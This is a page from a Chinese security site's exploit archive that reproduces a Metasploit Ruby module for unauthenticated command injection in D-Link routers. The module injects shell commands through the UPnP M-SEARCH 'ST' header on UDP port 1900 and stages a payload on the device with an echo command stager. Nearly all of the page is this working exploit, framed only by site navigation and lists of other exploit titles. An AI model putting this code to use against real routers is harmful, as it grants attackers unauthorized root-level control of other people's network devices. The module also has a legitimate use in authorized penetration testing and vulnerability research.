首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection
来源:metasploit.com 作者:Cutlip 发布时间:2014-07-14  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
      'Description' => %q{
        Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
        requests. This module has been tested on DIR-300 and DIR-645 devices. Zacharia Cutlip
        has initially reported the DIR-815 vulnerable. Probably there are other devices also
        affected.
      },
      'Author'      =>
        [
          'Zachary Cutlip', # Vulnerability discovery and initial exploit
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
          ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
        ],
      'DisclosureDate' => 'Feb 01 2013',
      'Privileged'     => true,
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian', # unknown if there are big endian devices out there
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPS
            }
          ]
        ],
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(1900)
      ], self.class)

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    configure_socket

    pkt =
      "M-SEARCH * HTTP/1.1\r\n" +
      "Host:239.255.255.250:1900\r\n" +
      "ST:upnp:rootdevice\r\n" +
      "Man:\"ssdp:discover\"\r\n" +
      "MX:2\r\n\r\n"

    udp_sock.sendto(pkt, rhost, rport, 0)

    res = nil
    1.upto(5) do
      res,_,_ = udp_sock.recvfrom(65535, 1.0)
      break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
      udp_sock.sendto(pkt, rhost, rport, 0)
    end

    # UPnP response:
    # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
    # we do not check for the Device ID (DIR-645) and for the firmware version because there are different
    # dlink devices out there and we do not know all the vulnerable versions

    if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  def execute_command(cmd, opts)
    configure_socket

    pkt =
      "M-SEARCH * HTTP/1.1\r\n" +
      "Host:239.255.255.250:1900\r\n" +
      "ST:uuid:`#{cmd}`\r\n" +
      "Man:\"ssdp:discover\"\r\n" +
      "MX:2\r\n\r\n"

    udp_sock.sendto(pkt, rhost, rport, 0)
  end

  def exploit
    print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device")
    end

    print_status("#{rhost}:#{rport} - Exploiting...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 950
    )
  end

  # the packet stuff was taken from the module miniupnpd_soap_bof.rb
  # We need an unconnected socket because SSDP replies often come
  # from a different sent port than the one we sent to. This also
  # breaks the standard UDP mixin.
  def configure_socket
    self.udp_sock = Rex::Socket::Udp.create({
      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
    })
    add_socket(self.udp_sock)
  end

  #
  # Required since we aren't using the normal mixins
  #

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  # Accessor for our UDP socket
  attr_accessor :udp_sock

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dell Sonicwall Scrutinizer 11.
·D-Link HNAP Request Remote Buf
·Flash "Rosetta" JSONP GET/POST
·D-Link info.cgi POST Request B
·Yokogawa CS3000 BKFSim_vhfd.ex
·HP Data protector manager 8.10
·Netgear WNR1000v3 - Password R
·Elipse E3 Scada PLC Denial Of
·Oracle Event Processing FileUp
·Oracle VirtualBox Guest Additi
·Gitlist Unauthenticated Remote
·Browserify 4.2.0 Remote Comman
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved